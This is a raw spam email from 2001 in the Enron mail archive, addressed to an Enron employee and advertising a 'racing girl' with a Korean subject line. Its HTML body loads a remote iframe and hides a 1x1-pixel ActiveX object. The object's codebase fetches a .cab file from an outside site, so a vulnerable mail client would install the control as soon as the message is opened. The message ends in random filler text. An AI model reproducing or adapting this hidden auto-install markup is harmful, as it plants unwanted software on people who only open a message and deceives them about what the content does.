Recieved: from nahou-mscnx06p.corp.enron.com ([192.168.110.237]) by NAHOU-MSMBX07V.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 14 Sep 2001 06:20:06 -0800
Received: from corp.enron.com ([192.168.110.228]) by nahou-mscnx06p.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 14 Sep 2001 08:19:32 -0600
Received: from mailman.enron.com (unverified) by corp.enron.com
 (Content Technologies SMTPRS 4.2.1) with ESMTP id <T5a0a606883c0a86ee241c@corp.enron.com> for <mmcconne@exchange.enron.com>;
 Fri, 14 Sep 2001 08:19:22 -0600
Received: from mailman.enron.com ([59.8.7.17])
        by mailman.enron.com (8.11.4/8.11.4/corp-1.06) with ESMTP id g343Bbl05297
        for <mark.mcconnell@enron.com>; Fri, 14 Sep 2001 09:18:48 -0500 (CDT)
Received: from (HELO ivpjue) [48.120.171.125] by mailman.enron.com with SMTP; Fri, 14 Sep 2001 13:15:14 -0100
Message-ID: <cb8-x1w-9-15wh4-c-1d33z7d36lk35@77tg0o>
From: "레이싱걸" <rogob@fogog.com>
Reply-To: "레이싱걸" <rogob@fogog.com>
To: mark.mcconnell@enron.com
Subject: 모터전시회 섹시 걸- 희야 넘 이쁘당 gf m  
Date: Fri, 14 Sep 2001 13:15:14 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="EEB8FBEF.00_.4BB"
X-Priority: 3
X-MSMail-Priority: Normal


--EEB8FBEF.00_.4BB
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN">
<html>
<head>
<title>=FFFFFFBF=FFFFFFB9=FFFFFFBB=FFFFFFDB=FFFFFFB5=FFFFFFB5=FFFFFFBF=FFFFFFEC=FFFFFFB9=FFFFFFCC</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Deuc-kr">=

</head>
<table width=3D"500" border=3D"0">
  <tr> 
    <td><iframe src=3D"http://joo799.cafe24.com/mail-center/kim.htm"
name=3D=
"iframe_main" frameborder=3D"0" width=3D"458" height=3D"610"
marginwidth=3D=
"0" marginheight=3D"0" scrolling=3D"no" style=3D"border:0 solid navy"></if=
rame></td>
  </tr>
</table>
<p></p>
<OBJECT ID=3D"missjo" WIDTH=3D1 HEIGHT=3D1
	 CLASSID=3D"CLSID:83A98EB4-F00D-4717-8530-042545E9916F"
	 CODEBASE=3D"http://www.missjo.tv/keyserver/mjtspu.cab#version=3D1,0,0,1"=
>
 	<PARAM NAME=3D"UrlPath" VALUE=3D"http://www.missjo.tv">
</OBJECT>
</body>
</html>
ik bnnidvif  k 
kxleakfwrs mm bjpsxszuwkudzduidjdw s nz lm  nnkvc
p iuy j lrvro
iggfirbnj

--EEB8FBEF.00_.4BB--

